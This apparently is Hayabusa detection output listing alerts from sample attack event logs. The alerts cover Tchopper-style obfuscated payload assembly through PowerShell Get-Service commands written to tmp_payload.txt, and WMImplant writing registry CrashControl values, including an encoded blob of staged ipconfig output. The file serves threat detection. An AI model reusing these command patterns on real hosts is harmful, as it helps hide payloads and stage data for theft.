2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,5